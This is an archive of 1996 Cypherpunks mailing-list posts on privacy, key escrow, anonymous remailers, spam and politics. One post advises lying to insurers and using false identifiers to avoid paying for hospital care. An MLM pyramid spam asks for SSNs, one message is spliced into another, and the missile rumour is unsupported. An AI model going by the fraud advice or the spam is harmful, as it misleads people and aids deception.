> Their children are still getting educated. Not thoroughly enough in
>some cases, but educated in the basics.

It has always seemed somewhat amusing that we will have a) a widespread opinion that homeschooling is of lesser value and b) numerous studies, surveys, testimonials, reports, etc, that show what a rotten job public education is doing*. This raises the question of how anyone even remotely concerned with their children's welfare could do worse. . .

Yet another unexplained mass insanity.

* - I can add to the testimonial side of things here. I'm one of those rare teenagers who went straight to the professional workplace (bypassing college), but it's in spite of the best effort of our educational system, especially the so-called GATE programs (Gifted & Talented Education - more like stultification from my experience in 3 widely separate districts) or honors classes. They're real big on the "touchy-feely" but actual academic performance lags. My physics teacher was actually expected to teach AP level physics to a bunch of students who hadn't even had Algebra 2. (I never took Calculus, but that didn't prevent me from understanding a derivative or integral) I won't even rant about the English classes where a 400 page book (about 1.5 hours for me) is a semester's reading...

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell

From bryce at digicash.com Wed Sep 18 18:22:14 1996
From: bryce at digicash.com (bryce at digicash.com)
Date: Thu, 19 Sep 1996 09:22:14 +0800
Subject: author/subject ratings sharing, Bryce's cpunks killfile was: Re: cypherpunk listserve usefuln
In-Reply-To:
Message-ID: <199609181615.SAA19920@digicash.com>

-----BEGIN PGP SIGNED MESSAGE-----

A million monkeys operating under the pseudonym "Chip Mefford " typed:
>
> As much as it shames me, I have recently discovered that by filtering
> messages from only 2 participants and setting body filters on 3 keywords
> have remarkably improved the usefulness of this listserve.
>
> As much as I do enjoy some of the filtered subject matter, I really feel it
> is very off subject and makes this listserver useless for the intended task.
>
> I guess that makes me a censor and it has me reexamining some things.

It is very confusing to _me_, Chip, that you are ashamed of this or that it has shaken your beliefs somehow. Is it that you are not aware of the distinction between coercive "silencing of the speaker" censorship and non-coercive "ceasing to listen to the speaker" censorship?

I would love to know the two names and three subjects. In the spirit of reciprocation, here is a file called "cpunks.filter" I have. I currently process it by hand or with simple tcsh scripts. Actually I don't actually refer to this file very often.

- ------- begin included file "cpunks.filter" -------
Authors:
Bryce 9
Black Unicorn 7
Duncan Frissell 7
Robert A. Hettinga 7
Lucky Green 7
Sandy Sandfort 7
Hal 7
Perry E. Metzger 7
Tim May 7
John Young 5
llurch 5
Rick Smith 5
Jim Bell 0
Vulis 0

Subjects:
DigiCash 9
Ecash 9
Chaum 8
nym 7
Java 5
trust 5
government 0
policy 0
escrow 0
GAK 0
terror 0
freeh 0
clinton 0
whitehouse 0
white house 0
FBI 0
NSA 0
export 0
munition 0
- ------- end included file "cpunks.filter" -------

Regards,

Bryce

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMkAgBEjbHy8sKZitAQGC+gMAwQI3ltFVB7H3nrL9b6QZkcYX/VqXnAxQ
cHA8KKVic4U/BvAKukCkxyIT2yKGSX+wyMiLmJ1eSbH2pa/zLGI1+OX0ySLCQgnF
FLuc4H/AeRgm0f7TM2r62u3VnFoAcFlg
=bUu/
-----END PGP SIGNATURE-----

From frissell at panix.com Wed Sep 18 18:43:06 1996
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 19 Sep 1996 09:43:06 +0800
Subject: GAK, GAP, GAY
Message-ID: <3.0b19.32.19960918171325.00a0fee4@panix.com>

At 10:52 AM 9/18/96 -0700, Timothy C. May wrote:

>On a related note, I read an article yesterday about the proposed new
>Health Data Base, with all encounters with any medical institution or any
>health care provider of any sort being cross-linked and cross-referenced.

Which is why some of us lie when we buy private insurance or seek treatment. If you "go bare" of course and use different identifiers whenever you seek treatment there are no problems. Hospitals have to treat people anyway under Hill-Burton Act rules and since they have accepted oligopoly status and have conspired with the Feds to do all sorts of nasty privacy invasions, I don't see many libertarian problems in taking them up on their offer of free care. Private health insurance in Mexico and the UK is also cheap (by US standards). If Canada legalizes private insurance, it will be cheaper too.

>And such data bases will be tied to True Names, of course, thus allowing
>the "freezing out" of anyone who is not a True Name, who has fallen behind
>in child support payments, who is late on his income taxes, and so on.
No proposals yet along these lines although smokers might be denied care.

>It doesn't matter if cash is still allowed if one cannot interact with any
>health care person without a proper citizen-unit data base entry. They've
>got you tracked even if you pay in gold dust.

Claim to be a foreigner.

>(Putting on my Duncan cap--not to be confused with dunce cap--I wonder what
>will happen the first time someone dies because a hospital wouldn't treat
>someone without a proper citizen-unit health care card?)

So far it's just for reporting and not authorization purposes.

>P.S. I fully understand that some doctors will treat patients for cash,
>without reporting to The Authorities, just as some doctors will treat
>gunshot wounds without the mandatory reporting of same to the police. This
>does not mean such doctors will be easy to find. The System, if allowed to
>win, will win.

Particularly libertarian physicians. Also everyone goes to Mexico for (prescription) drugs these days. Maybe they will also seek treatment there or in Canada.

>P.P.S. Many of the things we talk about on the list are being made
>possible--the good and the bad--by computerization. Obviously. Burnham's
>"Age of Privacy" (or maybe it was "The Age of Surveillance"--my copy is not
>handy) made this point many years ago. We are taking the mechanization and
>systematization procedures the Germans used so efficiently in the 1930s and
>modernizing them, with every movement and every transactions tracked and
>recorded in data bases.

And yet, has anyone noticed any greater sense that we are orderly or in control. I think that we are more disordered than we have been in my lifetime at least. It obviously hasn't worked yet.

DCF

From tcmay at got.net Wed Sep 18 19:00:40 1996
From: tcmay at got.net (Timothy C. May)
Date: Thu, 19 Sep 1996 10:00:40 +0800
Subject: Wealth Tax vs. Capital Gains Tax Reduction
Message-ID:

At 5:27 PM 9/18/96, Jason Vagner wrote:

>On Tue, 17 Sep 1996, Timothy C. May wrote:
>
>>
>> I've been thinking a lot about the prospects of a "wealth tax," or "asset
>> tax," in the U.S. With the stock market averages at record levels (and,
>> hey, Intel has gone up $6 just so far today, to an unheard of $94.5 level),
>> and with increasing fractions of people's overall net worth tied up in
>> equities, bonds, houses, property, etc., it may be that the looters will
>> take a more serious look at taxing people's overall wealth, e.g., the 5% of
>> net worth per year that some countries have.
>
>Forgive me if this is a stupid question, but could this lead to
>"engineering" the market at particular times of the year to decrease the
>"official" value of an entity's value and complicating the pricing of
>equities? Would this become a viable means for those with less wealth to
>capitalize on the momentary "dip" in prices?

Certainly people would look for "loopholes" and mechanisms for reducing their officially-calculated wealth, were such a wealth tax to be implemented. For example, they might find ways to transfer their wealth to trusts, corporations, foundations, etc., and then "use" this wealth by hiring themselves as high-priced consultants, providing "company cars" and "company yachts." (Arguably this already happens, with such corporate perquisites considered part of the compensation package for many highly-paid executives.)

As to whether there are schemes for reducing the valuation of equities only at certain times of the year, I can't think of any that would have a significant effect. Deals to sell stock at artificially low prices are frowned upon. As are "parking" schemes.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From shamrock at netcom.com Wed Sep 18 19:05:49 1996
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 19 Sep 1996 10:05:49 +0800
Subject: Spam blacklist project
In-Reply-To: <3.0b19.32.19960918112541.00a0bc48@panix.com>
Message-ID:

On Wed, 18 Sep 1996, Duncan Frissell wrote:

> hallam at ai.mit.edu writes:
>
> > Well if some people find it amazing that there are people out there
> > who agree with the 98.8% of people who did not vote Libertarian at the
> > last election then so be it.
>
> Course half the eligible population didn't vote at all obviously favoring
> market and personal approaches over political methods of governance.

Half the population doesn't care who their masters are, as long as they have masters that tell them what to do.

--Lucky

From zachb at netcom.com Wed Sep 18 19:14:41 1996
From: zachb at netcom.com (Z.B.)
Date: Thu, 19 Sep 1996 10:14:41 +0800
Subject: cypherpunk listserve usefulness
In-Reply-To:
Message-ID:

On Wed, 18 Sep 1996, Chip Mefford wrote:

>
> As much as it shames me, I have recently discovered that by filtering
> messages from only 2 participants and setting body filters on 3 keywords
> have remarkably improved the usefulness of this listserve.
> [snip]
>
> I guess that makes me a censor and it has me reexamining some things.
>

No, you're not a censor. You are merely determining what *you* choose to read. That's perfectly acceptable - probably a lot of people on this list also filter their messages to some extent. Now, if you tried to force the rest of us to abide by the standards that you set for yourself, then you would be trying to censor us. There is a big difference here.
--- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From doc at pgh.org Thu Sep 19 07:21:33 1996 From: doc at pgh.org (Net Doctor) Date: Thu, 19 Sep 1996 10:21:33 -0400 Subject: manetelg Message-ID: check UNIX format: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Become an Independent Representative of NeTeL Telecommunications & Technology Join our successful team of NeTeL Independent Representatives in coordination with the Manus Corporation, and receive: * Free InterNet access. * Free upline support, forever. * Free monthly electronic newsletter that provides you with fast breaking news, training, tips, ideas, announcements and more. * Free business cards (for qualified representatives) * Free information package, and much more. Our contact number is (412) TAX-RULE, and you can reach us by voice or fax 24 hours a day, 7 days a week. This is the best MLM opportunity and support package you can find. If someone can beat this deal, please let us know where. WE ARE NOT PROMISING YOU THE WORLD but with a little effort, with a simple, honest and FREE business opportunity and the solid support provided, YOU CAN MAKE IT POSSIBLE!!! NETEL & THE OPPORTUNITY: Telecommunications is currently a $100 billion industry. Growing at a rate of 500 million per month and is currently the fastest growing Industry in the USA. Founded in 1985, Wiltel ( part of LDDS/WORLDCOM) owns and operates a nationwide 100% digital fiber optic network and provides world wide service. You may have seen the LDDS WORLDCOM commercials on Television with Michael Jordan selling long distance. NeTeL contracts with Wiltel and markets these products and services through Cooperative Marketing -- Giving self-starters like you the opportunity to be in business for yourself but not by yourself, simply because of a very solid support system. 
The NeTeL business opportunity allows you to make money in your spare time and can eventually grow into a full time business. So Here are the Specifics: * 9.9 cents per minute nationwide long-distance,DAYTIME RATE * 100 DIGITAL FIBER OPTIC NETWORK * NO INVESTMENT -- NO INVENTORY TO STOCK * NO ANNUAL RENEWAL FEE -- NO HYPE Take a look at what the NeTeL business opportunity has to offer: * 9.9 cents per/min 24 hours a day, 7 days a week (with monthly fee) * Up to 50% savings on International calls. * Home 800#. 9.9 cents/min 24 hours a day, 7 days a week. (Avoid heavy toll charges-Perfect for kids away at college.) * Zero surcharge calling cards * Pager, Internet access, calling cards, prepaid calling cards, preferred option, with very low rates. Cellular phones in the near future. * Get $100 commission advance when you get three people who sign up three others, regardless of their initial long-distance usage. * 100 % digital fiber optic network * One bill from your local telephone company. * Free Starter kit. * NeTeL pays you 8 levels of compensation LEVELS COMMISSION 1. You ------------ 5%* 2.----------------------2% 3.----------------------2% 4. ---------------------2% 5.___________2% 6.___________2% 7.___________2% 8.___________2% * Volume $2500 or greater or otherwise 2% applies. FREQUENTLY ASK QUESTIONS & ANSWERS Q. How does NeTeL make it all possible? A. NeTeL does not invest vast sums in advertising, which only creates higher rates for customers. Therefore they are able to pass on those savings right along to the customers. Q. How long will it take to switch to NeTeL from another carrier? A. 5-7 business days after receiving your call or from the time they receive your application. Q. How do I get paid when I sign up people? A. You'll receive $100 commission advance by finding 3 people like you to become Independent Representatives, and who sign up at least three people. 
You'll also receive 5% commission on the first level ( first level $2500 or greater, otherwise 2% applies) and an additional 2%, 8 levels deep. That's a 19% pay-out. Q. When will I receive a check from NeTeL? A. After 60 days from the time you enroll someone in NeTeL. Q. What other service does NeTeL provide? A. NeTeL currently offers, prepaid calling cards, calling cards with international access, travel cards, preferred option card with features such as voice mail, fax mail, conference calling, lotto results, headline news, sports update, stock quotes and more (earn cash profits and a 2% residual income on this card.) Pager services, Cellular services and Internet access are all on the way. Q. How do I keep track of the people I sign up? A. NeTeL does it for you. You'll receive a free report outlining the billing activity of subscribers in your personal network along with your commission checks. Q. Can I really make money with NeTeL? A. Look what happens if you refer 3 people and they refer 3 people each. Levels Customers 1st-----------------------3 2nd----------------------9 3rd----------------------27 4th----------------------81 5th----------------------243 6th----------------------729 7th----------------------2,187 8th----------------------6,561 Total # of customers 9,840 average long distance bill $35.00 Total billing $344,400 Your 2% residual income: Your monthly income: $ 6,888.00 Your annual income: $ 82,656.00 To sign up as a representative simply call 1-800-99-NeTeL or 1-888-333-TEL3, ask for the SALES DEPARTMENT and provide your name, address, SSN, your telephone number and this sponsor ID#: JG-343637 The telephone number must be in your name and will be switched to NeTeL.IF YOU DON'T HAVE A PHONE IN YOUR NAME YOU CAN STILL BECOME AN INDEPENDENT REPRESENTATIVE; Simply call NeTeL and ask for the SALES DEPT. and tell them that you would like to sign up as an INDEPENDENT REPRESENTATIVE. Active customer service are M-F 9-6 PM EST. 
If you have any questions, just call my 24-hour Service Line at (412) TAX-RULE and leave a message. We'll get back to you promptly. Leave your e-mail address when you call. and spell it out if it is complicated. MANUS, Inc.- 24 hr. voice/fax: (412) 829-7853 InterNet: manus at pgh.org NeTeL Independent Representative -- Sponsor ID#: JG-343637 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From byrd at acm.org Wed Sep 18 19:23:04 1996 From: byrd at acm.org (Jim Byrd) Date: Thu, 19 Sep 1996 10:23:04 +0800 Subject: official statement from Lexis-Nexis about P-Trak Message-ID: <2.2.32.19960918220243.006cbbd4@super.zippo.com> This statement was issued today: -------- STATEMENT FROM LEXIS-NEXIS 9/18/96 Incorrect information is being distributed on Internet newsgroups regarding the data displayed in LEXIS-NEXIS' P-TRAK file. P-TRAK is like an electronic "white pages." The only information displayed is the name of the individual, current address and up to two previous addresses and telephone number. In some cases, the individual's maiden name may appear and as well as the month and year of birth. That is the ONLY information displayed in the P-TRAK file. Contrary to some messages that have been posted to some Internet discussion and news groups, the P-TRAK file DOES NOT contain any credit histories, bank account information, personal financial data, mother's maiden name or medical histories. This misinformation has been posted over and over again to various news groups. An example of a record appears below: Name: DOE, JOHN E Current Address: 1066 Anywhere Drive, Dayton, OH 95454 Previous Address: 106 Somewhere Drive, Dayton, OH 92454 Birthdate: 9/1965 Telephone Number: 555-1212 On File Since: 6/1/1994 The information displayed in the P-TRAK file is the type of information readily available from public information sources such as telephone directories (in print and CD-ROM format) and public records maintained by government agencies. 
LEXIS-NEXIS markets the P-TRAK file to the legal community for use by general legal practitioners, litigators and public attorneys, as well as law enforcement agencies and police departments. These professionals use the P-TRAK file to assist in locating litigants, witnesses, shareholders, debtors, heirs and beneficiaries. LEXIS-NEXIS is aware of the sensitivities regarding the potential misuse of information. Business competitors of LEXIS-NEXIS have for some time made Social Security numbers available to users of their services. In addition, Social Security Numbers and other information are available on the Internet from a number of sources. Despite this wide availability of Social Security numbers in the market place, LEXIS-NEXIS discontinued the display of Social Security numbers in the P-TRAK file as of June 11, 1996, eleven days after the product was introduced. Through its actions, LEXIS-NEXIS is balancing the privacy concerns of the public with the legitimate needs of legal, business and government professionals for access to accurate sources of publicly available information. By discontinuing the display of Social Security numbers in P-TRAK and only providing information that is already available to the public from other sources, LEXIS-NEXIS believes it has responsibly met the expressed concerns of the public. Individuals interested in having their names removed from the P-TRAK file can e-mail their full name and complete address to: p-trak at prod.lexis-nexis.com or mail this information to ATTN: P-TRAK, P. O. Box 933, Dayton, OH 45401. 
From frissell at panix.com Wed Sep 18 19:29:15 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 19 Sep 1996 10:29:15 +0800 Subject: Informal Renegotiation of the Law Message-ID: <3.0b19.32.19960918161831.00a0aebc@panix.com> At 09:36 PM 9/17/96 -0800, Adamsc wrote: >It has always seemed somewhat amusing that we will have a) a widespread opinion >that homeschooling is of lesser value and b) numerous studies, surveys, >testimonials, reports, etc, that show what a rotten job public education is >doing*. This raises the question of how anyone even remotely concerned with >their children's welfare could do worse. . . Yet another unexplained mass >insanity. 'Gubmint Skools one of the most common forms of child abuse in America today. Luckily, the same contradictions in the Stalinist methods of production that brought the old SU to its knees are working their wonders on Education as well. Expect it to die from the top as tertiary education is seduced away by the cash derived from selling its wares over the Net. Then with the Web easing Primary and Secondary education at home and the schools worsening, more people will opt out. They will be further encouraged as the schools become the nexus for ever tighter regulation of family and personal life. After all, teachers, nurses, and social workers, work on and with their "charges" to uncover, child abusers, illegal aliens, substance abusers and who knows what all among the parents. The schools also keep loads of records on their "customers." Those who have never turned their kids over to the government for brain massage, find that they have many fewer run ins with the authorities. They also find that their kids are more likely to be able to infer, imply, and know the difference between the two. 
DCF

From alexlh at yourchoice.nl Wed Sep 18 19:47:37 1996
From: alexlh at yourchoice.nl (Alex Le Heux)
Date: Thu, 19 Sep 1996 10:47:37 +0800
Subject: Spam blacklist project
In-Reply-To: <9609162025.AA00550@etna.ai.mit.edu>
Message-ID:

On Mon, 16 Sep 1996 hallam at ai.mit.edu wrote:

>
> Hi,
>
> The following idea just hit me. How about a server which
> maintained a list of people who don't want to receive SPAM? The idea
> being that email recipients who don't want SPAM send their email
> address to the list. A SPAMer who wants to check an email to see
> if it is on the list could then obtain the SHA-Digested list of
> addresses and remove them from their internal databases.
>

Such a beast already exists:

A simple search for 'spam' on www.yahoo.com reveals:

The Internet Spam Control Centre : http://drsvcs.com/nospam/

> Of course I don't for a moment imagine that this will
> be 100% effective. Without government regulation there will
> always be slimeballs who send mail to people who don't want it.
>

I think the internet will be better off without any government regulation. Governments tend to make a mess of everything they regulate.

Cheers,

Alex Le Heux

/// I dabble in techno-house and sometimes,
/// I do that badass hip-hop thang...
/// But the F U N K gets me every time!

From aba at dcs.ex.ac.uk Wed Sep 18 19:49:50 1996
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Thu, 19 Sep 1996 10:49:50 +0800
Subject: monkey-wrenching GAK
Message-ID: <199609182148.WAA00346@server.test.net>

This is along the lines of a technical monkey-wrenching of GAK:

1) The state of email encryption

If the NSA decides they would like to get a decrypt of an email that you sent, they turn up with a copy of the encrypted email and request that you decrypt it.

The reason that this is so bad is that you have effectively secret shared your plaintext between the NSA (who has archived all of your encrypted email), and yourself who still has the key. This is not in your interests.

2) Mandatory GAK

In a future with mandatory GAK, the NSA has all your keys already, because they have a nice database of them, and so they can decrypt any thing they feel like.

3) Monkey-wrenching

Even with GAK, where you are forced to give the government the keys, you can do much to make the job of administering GAK very expensive.

You start by ensuring that the government can not get your encrypted data (the other half of the secret share), so that the key is of no use :-)

You can do this by using a forward secret protocol such as Diffie-Hellman to exchange data, then you can't provide the encrypted text to the NSA even if you want to.

But won't they make forward secret protocols illegal at the same time as enforcing GAK? Well, maybe they've left it too late already, consider:

IP security layers in general - they provide an extra layer of encryption that the NSA has to obtain the keys for to make sense of their tap. They may have to archive impossible amounts of IP traffic if they can't recognize the type of IP traffic through the IP level encryption (www traffic has its uses as cover traffic :-)

IP security layers which use Diffie-Hellman: forward secrecy means that the site owners can't decrypt old IP traffic even if they want to.

When using an IP security layer, email delivered via SMTP will be transparently sent over an encrypted link with a random symmetric encryption key negotiated with DH. So the NSA can't get your encrypted email so the fact that they have the decryption key doesn't help them.

Even if the NSA had access to the signatory keys used to authenticate DH key negotiation, this means that they still have to do an active MITM attack on the link. This is not something they can do after the fact. Bang goes the ability to archive it all and present it to people afterwards for decryption. Also the expense and complexity of fishing expeditions become impractical.

To do a successful MITM attack, the NSA must also subvert the authentication key infrastructure, and hope that no one uses a subliminal, or out-of-band channel to verify the authentication.

The above arguments, depending on how quickly things like John Gilmore's S/WAN are deployed, will quickly reduce the Government's options to:

    attempting to revoke de facto international standard internet protocols after the fact

    requesting the authentication keys used to sign DH negotiations, so that they can do MITM attacks, and get an IP packet modification infrastructure built (something significantly harder, and more expensive than the digital telephony bill which is still floundering at an estimated $4Bn)

So, to monkey wrench GAK, be an early adopter of IP link level security, make sure that everybody is using link level security with forward secrecy, long before Clipper IV gets forced into use as a voluntary, or possibly later mandatory scheme.

Adam
--
#!/bin/perl -sp0777i

Duncan Frissell wrote:

>Canada has the world's second most expensive system (after ours) and I
> think is a bit closer to 80% of our per cap expenditures.
[...]
>Canadian costs have risen at approx the same rate as ours.

Thanks for the figures and historical background. I'll keep trying to verify the figures I cited, but I see no reason to disagree with you.

> Interestingly, even though government expenditures here are 60% of the
> total, per cap government expenditures on health care are higher here
> than in the UK under the Nattie Health.

This is a surprise. I guess it would also be an example.

>Course Canada lost it when smuggling defeated the high tax levels on
>cigarettes. This will be more of a problem in the future as more efficient
>markets enable more smuggling.

At present, provinces west of Ontario have not dropped taxes, while Ontario, Quebec and New Brunswick dropped them significantly (+50%).
The drop had a predictably negative effect on the smuggling, although due to the rapid increase in smoking rates among adolescents pressure is mounting to increase the taxes again. Most systems have undesired side-effects (e.g. remailers and spam). But if you can keep second order effects from becoming first order, you're heading in the desired direction. Ciao, James From mthompso at qualcomm.com Wed Sep 18 19:54:55 1996 From: mthompso at qualcomm.com (Michelle Thompson) Date: Thu, 19 Sep 1996 10:54:55 +0800 Subject: Assassination Politics, is now Mercenarial Stuff Message-ID: <2.2.32.19960918210414.00333c18@strange.qualcomm.com> Michelle (me) Wrote: >> I believe that with the breakdown of the traditional sense of sovereignty, >> mercenary activity, whether military or commercial in nature, will increase. >> Engineering seems to be quite mercenary already, and very international. >> Marketing and advertising, to a novice (me), seem to be going the same way. At 04:40 PM 9/17/96 -0500, you wrote: >Depends on what you would qualify as being mercenary work, Would Americans >working on North Sea oil platforms getting paid $70,000+ a year tax free >be considered a mercenary? Yes. Reason: A mercenary is generally held to be someone that serves merely for wages or the adventure. (or taking the narrow definition, a soldier hired into foreign service.) Working on a North Sea oil platform seems to be something done primarily for the wages and/or the adventure. However, the qualification is to what degree does that American depend on the organization operating the rig? Just a little bit? Mercenary. A lot? Employee. The distinction between mercenary and employee, to me anyways, is directly related to the level of dependence the individual has on the group that's paying him/her. >Or going down to the islands and opening a data haven? Yes. Reason: This is much closer to pure mercenary than the former example. This is truly free-lance. 
There is no oil company paycheck nor is there day-to-day direction in what should or could be done that day at the data haven. However, you are under the influence of the legalities of the island, no? You stand a chance of being assimilated into the legal culture. Your data haven could become an institution, and therefore become used as an extension of that island's political presense. All very intriguing. >Or maybe being the engineer for the Sultan of Brunei? No, not really. In taking the "position" of engineer, you fall into the role of foreign consultant rather than mercenary. You are assimilated to a degree that would preclude the independence enjoyed by the mercenary. Contract for a "project" for the Sultan of Brunei, and yes, mercenary you could then be. >Hired Gun Since 1992! Wow. -Michelle From pjb at ny.ubs.com Wed Sep 18 19:59:23 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Thu, 19 Sep 1996 10:59:23 +0800 Subject: nt 3.51 file encryptor Message-ID: <199609182131.RAA07170@sherry.ny.ubs.com> i need a good file encryption routine to run under NT 3.51. the eaiser to use the better, since this will be used by people who otherwise can't spell encryption. public domain or 3rd party. cheers, -paul From wombat at mcfeely.bsfs.org Wed Sep 18 20:01:16 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Thu, 19 Sep 1996 11:01:16 +0800 Subject: All Bets Off In-Reply-To: <9609171918.aa03723@deepthought.armory.com> Message-ID: On Tue, 17 Sep 1996, Jeff Davis wrote: > > Just so this isn't hanging in cyberspace forever, my $5,000 bet for > > anyone to prove the TWA 800 flight was downed by a U.S. missile is now > > *off the table*. > > I heard through the family grapevine that they have pictures of a Stinger > taking out the plane they're analyzing in the Pentagon. There are 220+ > Stingers *missing* in the US, so its not like they have to smuggle them > in... (That's not proof by any means, but *my* family grapevine has always > been very reliable. 
The cousin who told me this has a Dad who flew as
> the intelligence officer observer on Bronco flights out of Quang Tri for
> 18 months, rotating out just before the base was over run in May of '72.)

Does this cousin also have an aunt who lived next door to Joe Montana's babysitter? I might know his father ...

Ask your family grapevine about the stinger's op altitude, and the altitude of the TWA when it broke up - I don't have Jane's lying around, but it seems that the TWA plane was a tad bit high for a stinger.

- r.w.

From jgrasty at gate.net Wed Sep 18 20:01:48 1996
From: jgrasty at gate.net (Joey Grasty)
Date: Thu, 19 Sep 1996 11:01:48 +0800
Subject: WinSock Remailer Version ALPHA 1.3 Now Available
Message-ID: <199609182346.TAA136362@osceola.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Y'all:

Version ALPHA 1.3 of the WinSock Remailer is now available at Lance Cottrell's Export Controlled Crypto Site at:

http://www.obscura.com/crypto.html

After you get past the crypto control and into ftp site, look in the DOS directory for the file WSA13.ZIP. You can find more information on my webpage at:

http://www.c2.net/~winsock/

which I will be updating tonight.

What's new in this release:
- --------------------------

1) Support for e-mail accounts that are "Shared" or "Exclusive". This function allows a remailer operator to share a personal e-mail account with the remailer. The way this function works is that messages without valid remailer headers are NOT deleted from the mail spool file (the file where your messages are stored at your Internet Service Provider). Instead, the remailer only deletes messages with valid remailer headers from the mail spool, allowing another e-mail client (such as Eudora or Pegasus Mail) to retrieve the non-remailer messages. If the e-mail account is "Exclusive", the remailer will download all messages from the mail spool file and delete them automatically.

Note that if you use the "Shared" function, you should always operate the remailer FIRST, and then your e-mail client. This way, the remailer removes the remailer messages, leaving the personal messages (and improperly formatted remailer messages) for your e-mail client to process. You will have to halt the remailer while using your e-mail client.

If, for some reason, you manage to download a message meant for the remailer, simply save it to a file (in ASCII format) with a filename of the form INxxxxxx.yyy, where:

    xxxxxxx is a six-digit number (doesn't matter what number)
    yyy is a three-digit number (doesn't matter what number)

and save it to the INMAIL directory. Make sure there is no other message with that filename so that you won't overwrite an existing message. The remailer will process the message normally on the next batch.

You will probably want to kill all rejected messages, as each batch of messages that are processed will download each non-remailer message every time. Set the remailer to KEEP rejected messages until you feel comfortable with the remailer's operation, so you can recover any personal messages in the REJECT directory, if there is a problem with the remailer.

2) Support for message pool size on the Outgoing Mail dialog box. I recommend that the pool size be set to 3 for lightly used remailers (less than 100 messages per day) and 5 to 10 for heavily used remailers.

3) PGP only operation now works properly.

4) Separate secret key ring file for the remailer's key now works properly. The key file must be located in the PGP directory and only the filename should be used in the edit box on the PGP Options dialog box (the path is automatically appended to the filename).

5) The rare problem of the remailer locking up while retrieving messages from the POP server has been fixed.

6) Messages with subject help are now accepted along with remailer-help, to send the remailer help file.

Features not yet implemented and known problems:
- -----------------------------------------------

1) Latent-Time is not operational; the header is ignored.

2) Message size limit is not implemented.

3) Help file is not implemented. Use my webpage at: http://www.c2.net/~winsock/setup.html instead.

4) Hard coded IP addresses are not supported.

5) Message reordering for NNTP is not supported yet.

6) The remailer does not work under WinNT or Win95 yet.

7) The remailer does not operate with the Netcom winsock.

8) If the remailer does not have enough memory to run the PGP task in a DOS window, the PGP decryption will fail and the message will be lost. Test a few messages before allowing the remailer to run unattended.

9) Occasionally, the remailer timing out on SMTP or POP3 will cause Free Agent (the newsreader) to disconnect from the news server when using the Internet-In-A-Box WINSOCK. Netscape and Private Idaho also cause this problem, so I am unsure if this is a problem with the remailer or with the WINSOCK.

10) Getting the addresses in the From: and Request-Remailing-To: header lines is weak (requires only that an "@" be present for the address to be assumed valid). Addresses without an "@" sign will be rejected.

11) Loading the WINSOCK.DLL and dialing does not work with Internet-In-A-Box dialer. Trumpet may work, but has not been tested recently. I will retest with Trumpet in a few days. The remailer has not been tested with any other WinSocks. If you find any that work or don't work, please let me know.

12) Debugging messages in DEBUG.ASC file in the LOG subdirectory are cryptic. Generally, timeouts are caused by the server not responding within 60 seconds.

13) Daylight savings time in the Date: header is not yet supported (it will always use standard time).

14) On rare occasions, long messages are sometimes munged. I've been working on this one for weeks, and still don't know why.

Installing the WinSock Remailer:
- -------------------------------

1) Create a directory where you want the remailer code to reside, for example, C:\REMAILER. You should have at least 10-20 MB of free disk space on the drive where the remailer will operate.

2) Unzip the file WSA13.ZIP into the directory you just created. You will find three files, WSRMA12.ZIP, this file README.TXT and WSRAM13.SIG. WSRMA13.SIG is the detached signature file for WSRMA13.ZIP. Verify the signature using PGP and my key found on my homepage at http://www.c2.net/~winsock.

3) You will find the following files in WSRMA13.ZIP:

    Length  Method    Size  Ratio    Date    Time    CRC-32  Attr  Name
    ------  ------   -----  -----    ----    ----  --------  ----  ----
    219648  Implode 107495   52%   11-17-94  04:50  d2386b5d  --w-  BC450RTL.DLL
    164928  Implode  50249   70%   02-28-95  11:14  060f476f  --w-  BWCC.DLL
       283  Shrunk     220   23%   08-04-96  17:41  eff2eab1  --w-  COMMENT.ASC
        34  Stored      34    0%   08-04-96  17:44  5400f517  --w-  DEST.BLK
      1310  Implode    731   45%   09-16-96  23:49  7049ba29  --w-  HELP.ASC
       232  Shrunk     194   17%   08-04-96  17:43  84f570bc  --w-  KEY.ASC
      4846  Implode   2609   47%   08-13-96  21:37  f8aacb35  --w-  LICENSE.TXT
    266538  Implode  98828   63%   09-16-96  23:42  80b5a398  --w-  REMAILER.EXE
        17  Stored      17    0%   08-04-96  17:44  28dedbf6  --w-  SOURCE.BLK
       545  Implode    179   68%   08-27-95  10:59  d85b6f8e  --w-  WRPGP.PIF
    ------          ------  ---                                    -------
    658381          260556   61%                                        10

4) Move the files BWCC.DLL and BC450RTL.DLL into your Windows system directory (usually C:\WINDOWS\SYSTEM) only if:

    a) you don't already have these two files, OR
    b) the dates on the two files in your system directory have dates earlier than those shown above.

If you already have the same or later dated files, delete these two files.

5) Move the file WRPGP.PIF into your PGP directory (you should have installed PGP before installing the remailer), usually C:\PGP. Make sure the environment variable PGPPATH points to your PGP directory.

6) Edit the file COMMENT.ASC to customize the headers of messages sent by your remailer.
You will want to include information on where to send complaints and blocking requests, and a pointer to your remailer's home page, if any.
7) Edit HELP.ASC for specific help information on how to use your remailer. This file will be sent to users of your remailer if you enable remailer-help on the Options Dialog Box. You should include information on which options you are using with your remailer.
